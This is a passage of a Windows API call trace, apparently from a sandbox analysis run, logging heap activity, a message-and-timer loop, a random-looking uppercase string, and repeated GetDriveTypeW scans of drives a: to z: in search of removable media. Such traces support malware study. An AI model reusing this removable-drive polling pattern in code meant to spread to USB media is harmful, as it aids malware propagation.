0x12ef830 [0218.309] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0218.309] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0218.309] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0218.309] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 1 [0218.309] TranslateMessage (lpMsg=0x7dfb8c) returned 0 [0218.309] DispatchMessageW (lpMsg=0x7dfb8c) returned 0x0 [0218.309] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0218.310] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0218.310] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.310] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0218.310] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0218.310] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef810 [0218.310] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325fc0 [0218.310] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0218.310] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0218.310] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0218.310] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0218.310] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325fc0 | out: hHeap=0x12c0000) returned 1 [0218.310] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0218.311] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0218.311] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e4c0 [0218.311] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.311] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e4c0 | out: hHeap=0x12c0000) returned 1 [0218.311] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.311] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0218.311] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0218.311] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0218.311] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0218.311] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0218.311] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0218.311] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef830 | out: hHeap=0x12c0000) returned 1 [0218.311] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0218.311] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0218.311] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0218.311] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0218.311] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0218.311] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0218.311] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef870 [0218.311] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0218.311] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0218.311] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0218.311] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef870 | out: hHeap=0x12c0000) returned 1 [0218.311] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd310 [0218.311] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0218.312] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.312] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0218.312] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0218.312] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0218.312] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef840 [0218.312] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd370 [0218.312] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef840 | out: hHeap=0x12c0000) returned 1 [0218.312] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0218.312] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0218.312] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef880 [0218.312] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0218.312] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0218.312] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0218.312] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0218.313] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0218.313] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0218.313] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0218.313] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0218.313] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0218.313] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0218.314] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0218.314] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0218.314] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0218.314] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0218.314] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0218.315] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0218.315] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0218.315] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0218.315] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0218.315] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0218.315] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0218.316] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0218.316] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0218.316] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0218.316] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0218.316] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0218.316] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0218.317] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0218.317] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0218.317] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0218.317] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0218.317] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd370 | out: hHeap=0x12c0000) returned 1 [0218.317] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0218.317] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0218.317] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0218.317] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0218.317] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0218.317] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef850 [0218.317] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0218.317] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0218.317] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0218.317] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.318] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef860 [0218.318] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0218.318] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef870 [0218.318] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1326160 [0218.318] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0218.318] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0218.318] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0218.318] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0218.318] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1326160 | out: hHeap=0x12c0000) returned 1 [0218.318] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef870 | out: hHeap=0x12c0000) returned 1 [0218.318] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef860 | out: hHeap=0x12c0000) returned 1 [0218.318] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e400 [0218.318] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.318] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e400 | out: hHeap=0x12c0000) returned 1 [0218.318] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.318] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0218.318] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0218.318] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef880 | out: hHeap=0x12c0000) returned 1 [0218.318] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0218.318] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0218.318] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0218.318] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef850 | out: hHeap=0x12c0000) returned 1 [0218.318] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0218.318] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0218.319] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0218.319] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6e0 [0218.319] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0218.319] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0218.319] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8a0 [0218.319] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0218.319] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0218.319] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0218.319] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0218.319] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd2f8 [0218.319] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318c78 [0218.319] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.319] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef870 [0218.319] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fec40 [0218.319] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0218.319] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0218.319] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0218.319] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0218.319] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0218.319] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0218.319] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0218.319] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7d0 [0218.319] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0218.319] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0218.319] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0218.320] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0218.320] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0218.320] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0218.320] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0218.320] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0218.321] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0218.321] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0218.321] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0218.321] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0218.321] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0218.321] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0218.322] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0218.322] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0218.322] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0218.322] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0218.323] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0218.323] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0218.323] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0218.323] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0218.323] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0218.323] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0218.324] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0218.324] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0218.324] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0218.324] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0218.324] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0218.324] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0218.324] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0218.324] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0218.324] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fec40 | out: hHeap=0x12c0000) returned 1 [0218.324] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef870 | out: hHeap=0x12c0000) returned 1 [0218.324] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0218.324] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0218.324] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7a0 [0218.324] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0218.325] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0218.325] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0218.325] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.325] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7d0 [0218.325] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0218.325] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7e0 [0218.325] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325fe0 [0218.325] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0218.325] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0218.325] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0218.325] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0218.325] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325fe0 | out: hHeap=0x12c0000) returned 1 [0218.325] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7e0 | out: hHeap=0x12c0000) returned 1 [0218.325] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0218.325] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132dfc0 [0218.325] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.325] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132dfc0 | out: hHeap=0x12c0000) returned 1 [0218.325] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.325] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318c78 | out: hHeap=0x12c0000) returned 1 [0218.325] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0218.325] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0218.325] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0218.325] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0218.325] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0218.325] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0218.325] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0218.325] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0218.326] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0218.326] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef810 [0218.326] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0218.326] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0218.326] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef810 [0218.326] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0218.326] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0218.326] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0218.326] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0218.326] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd1d8 [0218.326] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318ba0 [0218.326] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.326] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6e0 [0218.326] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0218.326] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0218.326] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7b0 [0218.326] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd358 [0218.327] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7b0 | out: hHeap=0x12c0000) returned 1 [0218.327] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0218.327] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0218.327] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef860 [0218.327] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef800 [0218.327] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0218.327] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0218.327] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0218.327] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0218.327] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0218.327] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0218.328] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0218.328] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0218.328] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0218.328] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0218.328] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0218.328] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0218.329] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0218.329] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0218.329] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0218.329] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0218.329] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0218.330] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0218.330] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0218.330] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0218.331] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0218.331] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0218.331] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0218.331] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0218.331] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0218.332] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0218.332] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0218.332] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0218.332] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0218.332] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0218.332] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, 